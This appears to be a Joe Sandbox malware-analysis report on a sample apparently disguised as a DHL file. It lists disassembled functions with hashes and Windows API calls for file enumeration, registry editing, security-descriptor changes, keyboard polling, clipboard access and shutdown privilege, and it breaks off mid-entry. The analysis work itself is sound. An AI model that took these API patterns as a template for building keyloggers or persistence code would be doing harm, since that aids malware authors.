Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 3953360268-2428617273
Opcode ID: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
Instruction ID: c27a90bfcd4eb9ed5b1aad85bb3a3ab8013bec405cd186e925982f48921c3122
Opcode Fuzzy Hash: c9903bcd93424a867fc5090ede8d5755021237eaddaf09ed2d6bcc1c1527408b
Instruction Fuzzy Hash: FBA142B2418315ABC710EB68C895DAFB7ECFF94704F404A2AF595D3291EA34DA04CB63

Function 0093F200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0093F221
_wcscmp.LIBCMT ref: 0093F236
_wcscmp.LIBCMT ref: 0093F24D
GetFileAttributesW.KERNEL32(?), ref: 0093F25F
SetFileAttributesW.KERNEL32(?,?), ref: 0093F279
FindNextFileW.KERNEL32(00000000,?), ref: 0093F291
FindClose.KERNEL32(00000000), ref: 0093F29C
FindFirstFileW.KERNEL32(*.*,?), ref: 0093F2B8
_wcscmp.LIBCMT ref: 0093F2DF
_wcscmp.LIBCMT ref: 0093F2F6
SetCurrentDirectoryW.KERNEL32(?), ref: 0093F308
SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F326
FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F330
FindClose.KERNEL32(00000000), ref: 0093F33D
FindClose.KERNEL32(00000000), ref: 0093F34F

Strings

*.*, xrefs: 0093F2B3

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
Instruction ID: 8461ac7b01615347816d8a0bad5181ef4e943ad64c89d5c39bcf4630e598e0c9
Opcode Fuzzy Hash: 191efdcdd44f7733e4b614890f414a32674627a5e12d8e965e3dc036aef34923
Instruction Fuzzy Hash: E531B276900219AADF10EBB5DC68AEF73ACAF483A1F100176F914D31A0EB34DA45DF50

Function 00950AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON

Download Yara Rule

APIs

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950BDE
RegCreateKeyExW.ADVAPI32(?,?,00000000,0095F910,00000000,?,00000000,?,?), ref: 00950C4C
RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00950C94
RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00950D1D
RegCloseKey.ADVAPI32(?), ref: 0095103D
RegCloseKey.ADVAPI32(00000000), ref: 0095104A

Strings

REG_DWORD, xrefs: 00950F0E
REG_BINARY, xrefs: 00950FD8
REG_SZ, xrefs: 00950D5B
REG_MULTI_SZ, xrefs: 00950E05
REG_EXPAND_SZ, xrefs: 00950CBA
REG_QWORD, xrefs: 00950F8B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Close$ConnectCreateRegistryValue
String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
API String ID: 536824911-966354055
Opcode ID: 65fb57842d280c823b7ce7aa7c6880859974549b764c8c1bd7d0127ca30a633a
Instruction ID: c43a452364a1ae5850e93eb7970d03fc380388dbb9e86c63359b3199ee5d9862
Opcode Fuzzy Hash: 65fb57842d280c823b7ce7aa7c6880859974549b764c8c1bd7d0127ca30a633a
Instruction Fuzzy Hash: 50025F75204611AFCB14EF29C895E2AB7E5FF89714F04895DF9899B3A2CB30EC44CB42

Function 0093F35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0093F37E
_wcscmp.LIBCMT ref: 0093F393
_wcscmp.LIBCMT ref: 0093F3AA

Part of subcall function 009345C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 009345DC

FindNextFileW.KERNEL32(00000000,?), ref: 0093F3D9
FindClose.KERNEL32(00000000), ref: 0093F3E4
FindFirstFileW.KERNEL32(*.*,?), ref: 0093F400
_wcscmp.LIBCMT ref: 0093F427
_wcscmp.LIBCMT ref: 0093F43E
SetCurrentDirectoryW.KERNEL32(?), ref: 0093F450
SetCurrentDirectoryW.KERNEL32(0098A5A0), ref: 0093F46E
FindNextFileW.KERNEL32(00000000,00000010), ref: 0093F478
FindClose.KERNEL32(00000000), ref: 0093F485
FindClose.KERNEL32(00000000), ref: 0093F497

Strings

*.*, xrefs: 0093F3FB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
Instruction ID: 385f3f936b3fe071c017cf7447c746325f29cc884df6aba658f8ecbd0b1f8606
Opcode Fuzzy Hash: 562cf2674d2d4b4ee61eed27b1e62412193d33f2f0ca89129c70a423a16dcee7
Instruction Fuzzy Hash: 5931C2729012196ADB10AB65ECACAEF77AC9F49365F200175F914E31B0DB34DE84DF60

Function 009281F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00928766
Part of subcall function 0092874A: GetLastError.KERNEL32(?,0092822A,?,?,?), ref: 00928770
Part of subcall function 0092874A: GetProcessHeap.KERNEL32(00000008,?,?,0092822A,?,?,?), ref: 0092877F
Part of subcall function 0092874A: HeapAlloc.KERNEL32(00000000,?,0092822A,?,?,?), ref: 00928786
Part of subcall function 0092874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0092879D

Part of subcall function 009287E7: GetProcessHeap.KERNEL32(00000008,00928240,00000000,00000000,?,00928240,?), ref: 009287F3
Part of subcall function 009287E7: HeapAlloc.KERNEL32(00000000,?,00928240,?), ref: 009287FA
Part of subcall function 009287E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00928240,?), ref: 0092880B

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0092825B
_memset.LIBCMT ref: 00928270
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0092828F
GetLengthSid.ADVAPI32(?), ref: 009282A0
GetAce.ADVAPI32(?,00000000,?), ref: 009282DD
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 009282F9
GetLengthSid.ADVAPI32(?), ref: 00928316
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00928325
HeapAlloc.KERNEL32(00000000), ref: 0092832C
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0092834D
CopySid.ADVAPI32(00000000), ref: 00928354
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00928385
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 009283AB
SetUserObjectSecurity.USER32(?,00000004,?), ref: 009283BF

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
Instruction ID: e6e730f4d6fb5248252aec7a5d76be97ad09da0d00115daa63acff7a510c5ed6
Opcode Fuzzy Hash: 9ee18397c5c45e0c2331a7764782a7428876ec3604c56e95501c8b0b43564e7c
Instruction Fuzzy Hash: AF616A71905219EFDF00DFA5EC98AEEBBB9FF04710F188129F815A7291DB319A05DB60

Function 008E6843 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

NO_AUTO_POSSESS), xrefs: 00921567
LIMIT_MATCH=, xrefs: 009215A9
BSR_ANYCRLF), xrefs: 00921757
UTF), xrefs: 00921533
BSR_UNICODE), xrefs: 00921771
CR), xrefs: 009216C0
CRLF), xrefs: 009216FA
UTF16), xrefs: 00921508
LIMIT_RECURSION=, xrefs: 00921635
ANYCRLF), xrefs: 00921734
NO_START_OPT), xrefs: 00921588
UCP), xrefs: 00921546
LF), xrefs: 009216DD
ANY), xrefs: 00921717

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
Instruction ID: 2cb210ca25d5eb902f4529add3bcf9679f135e71f96bde00bb37ce117b0d8ef6
Opcode Fuzzy Hash: d2429f5dc1fa859d8c01f4adcd3fc8dca81174f4835cbaa3b6ec18e61aaafa42
Instruction Fuzzy Hash: B172A271E00269DBDB24DF59D8807AEB7F5FF69310F14816AE849EB284E7309D91CB90

Function 00950665 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 009510A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00950038,?,?), ref: 009510BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00950737

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 009507D6
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0095086E
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00950AAD
RegCloseKey.ADVAPI32(00000000), ref: 00950ABA

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: b7dd666db2bf3ad571d338538e6ee4828b0e4468470661e9083fe9323ea5328c
Instruction ID: 2fc98319bc2b73ec4307b94dd4a6980fa76617befbc8545854c092d2fb8f22d1
Opcode Fuzzy Hash: b7dd666db2bf3ad571d338538e6ee4828b0e4468470661e9083fe9323ea5328c
Instruction Fuzzy Hash: 7AE13171604310AFCB14DF29C895E6ABBE8FF89714F04896DF899D7262DA30ED05CB52

Function 00930219 Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00930241
GetAsyncKeyState.USER32(000000A0), ref: 009302C2
GetKeyState.USER32(000000A0), ref: 009302DD
GetAsyncKeyState.USER32(000000A1), ref: 009302F7
GetKeyState.USER32(000000A1), ref: 0093030C
GetAsyncKeyState.USER32(00000011), ref: 00930324
GetKeyState.USER32(00000011), ref: 00930336
GetAsyncKeyState.USER32(00000012), ref: 0093034E
GetKeyState.USER32(00000012), ref: 00930360
GetAsyncKeyState.USER32(0000005B), ref: 00930378
GetKeyState.USER32(0000005B), ref: 0093038A

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
Instruction ID: 6326b42d775799a1dda46e320bd05ba73825e244d91766c5dab46e004a4d03e6
Opcode Fuzzy Hash: 4f917f632f07b0f260cf14d422ddc5956073888951a2dd71f082f7d9e35083b3
Instruction Fuzzy Hash: 3A41B9645087C96EFF319A6488283B6BEA9BF92340F08409DD5D6471C2EBD55DC4CFA2

Function 009486D0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON

Download Yara Rule

APIs

Part of subcall function 008D9997: __itow.LIBCMT ref: 008D99C2
Part of subcall function 008D9997: __swprintf.LIBCMT ref: 008D9A0C

CoInitialize.OLE32 ref: 00948718
CoUninitialize.OLE32 ref: 00948723
CoCreateInstance.OLE32(?,00000000,00000017,00962BEC,?), ref: 00948783
IIDFromString.OLE32(?,?), ref: 009487F6
VariantInit.OLEAUT32(?), ref: 00948890
VariantClear.OLEAUT32(?), ref: 009488F1

Strings

Failed to create object, xrefs: 0094878E, 00948844
Invalid parameter, xrefs: 0094880F
NULL Pointer assignment, xrefs: 009487C8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 834269672-1287834457
Opcode ID: b56b43abe67bf895b5ae8518329356f937cd46360170741d5181e758796dda33
Instruction ID: 3924aabd4e059e730fb84b1f8b8ce5a3c4bd333f8c29c577208e9de06464d771
Opcode Fuzzy Hash: b56b43abe67bf895b5ae8518329356f937cd46360170741d5181e758796dda33
Instruction Fuzzy Hash: 37616770608301AFD710DF64C898E6FBBE8AF88714F10491AF9959B391DB74ED48CB92

Function 00944458 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 0094447F
EmptyClipboard.USER32 ref: 00944485
GlobalAlloc.KERNEL32(00000002,?), ref: 0094449A
CloseClipboard.USER32 ref: 00944539

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
Instruction ID: e1322b11137598c9c3ca75d4520d03a0bc0f51181492293b75d86667c6315b4a
Opcode Fuzzy Hash: e89b880b2c9b20db2b0759dab93f62ac2f7ce94a0c1f229a5a1848914778e1d2
Instruction Fuzzy Hash: E321AE35215224AFDB10AF25EC19F6E7BA8FF44722F10802AF946DB2B1CB35AC00DB55

Function 00933A2B Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON

Download Yara Rule

APIs

Part of subcall function 008D48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008D48A1,?,?,008D37C0,?), ref: 008D48CE

Part of subcall function 00934CD3: GetFileAttributesW.KERNEL32(?,00933947), ref: 00934CD4

FindFirstFileW.KERNEL32(?,?), ref: 00933ADF
DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00933B87
MoveFileW.KERNEL32(?,?), ref: 00933B9A
DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00933BB7
FindNextFileW.KERNEL32(00000000,00000010), ref: 00933BD9
FindClose.KERNEL32(00000000,?,?,?,?), ref: 00933BF5

Strings

\*.*, xrefs: 00933A8A, 00933A93, 00933AA8

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 4002782344-1173974218
Opcode ID: 68603b36f716f7d758e1c9e225d9c45e72a7d4993db738acc4dc3393411ad229
Instruction ID: ea5e4b567d3f0b6a9ce3f2b1499de0b4b4d9c4e74f7ea706c26436f1ed370517
Opcode Fuzzy Hash: 68603b36f716f7d758e1c9e225d9c45e72a7d4993db738acc4dc3393411ad229
Instruction Fuzzy Hash: C55160318452599ACF15EBA4CD929FDB7B9EF14300F64826AE442B7191EF306F09CF61

Function 008E4140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON

Download Yara Rule

Strings

ERCP, xrefs: 008E421F
VUUU, xrefs: 00917B0C
VUUU, xrefs: 008E4520
VUUU, xrefs: 008E44ED
VUUU, xrefs: 008E44DB
%s%u, xrefs: 008E42A9

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID:
String ID: %s%u$ERCP$VUUU$VUUU$VUUU$VUUU
API String ID: 0-2149088777
Opcode ID: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
Instruction ID: 474b097fe9709529bd1e0a15d341f54804d27cd93056f1a838f1bf80cb978821
Opcode Fuzzy Hash: f8f13be8e42c035ef07eb6fe6b2f081b392b0a41965f2b8a8f3da4b5d7fc2299
Instruction Fuzzy Hash: 8DA27A74A0425E8BDF24CF59C9807EEB7B1FB56314F2491AAD85AE7280D7309EC5DB80

Function 0093F65E Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON

Download Yara Rule

APIs

Part of subcall function 008D7F41: _memmove.LIBCMT ref: 008D7F82

FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 0093F6AB
Sleep.KERNEL32(0000000A), ref: 0093F6DB
_wcscmp.LIBCMT ref: 0093F6EF
_wcscmp.LIBCMT ref: 0093F70A
FindNextFileW.KERNEL32(?,?), ref: 0093F7A8
FindClose.KERNEL32(00000000), ref: 0093F7BE

Strings

*.*, xrefs: 0093F690

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
String ID: *.*
API String ID: 713712311-438819550
Opcode ID: 172da1fa3c0971d243467e9bb92ba2f786b94d24d73b8d970d722686764af726
Instruction ID: 5f9de1f7afcfa30623b9828b0faad4a949b430658d3b0c3829752c6609bd9414
Opcode Fuzzy Hash: 172da1fa3c0971d243467e9bb92ba2f786b94d24d73b8d970d722686764af726
Instruction Fuzzy Hash: 6F416D71D0421A9BDF11EF64CC95EEEBBB8FF05314F144566E819A22A0EB309E44CF91

Function 008E58C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 008E5A05
_memmove.LIBCMT ref: 008E5A55
_memmove.LIBCMT ref: 008E5ABB

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: a6416dd51b0e3d1f6db78860a0f43478df9ef02aa56f99964aa2b5807b8a065d
Instruction ID: e333aaee721e609c57b45a4aff371045eedc09e536e5d7a92461db0bb6ef30a9
Opcode Fuzzy Hash: a6416dd51b0e3d1f6db78860a0f43478df9ef02aa56f99964aa2b5807b8a065d
Instruction Fuzzy Hash: E212BB70A00619DFDF14DFA9D981AAEB7F5FF88304F104229E406E7296EB35AD11CB51

Function 0093545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00928CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00928D0D
Part of subcall function 00928CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00928D3A
Part of subcall function 00928CC3: GetLastError.KERNEL32 ref: 00928D47

ExitWindowsEx.USER32(?,00000000), ref: 0093549B

Strings

, xrefs: 00935489
@, xrefs: 0093548E
SeShutdownPrivilege, xrefs: 0093546B

Memory Dump Source

Source File: 00000000.00000002.2064659538.00000000008D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008D0000, based on PE: true

Associated: 00000000.00000002.2064604906.00000000008D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.000000000095F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064808824.0000000000985000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064921519.000000000098F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2064983366.0000000000998000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8d0000_DHL 806-232024.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $@$SeShutdownPrivilege
API String ID: 2234035333-194228
Opcode ID: ac19edf39cc9dd1d5ba1b2c6933349d848efad085edc48f72bb567f087e4a893
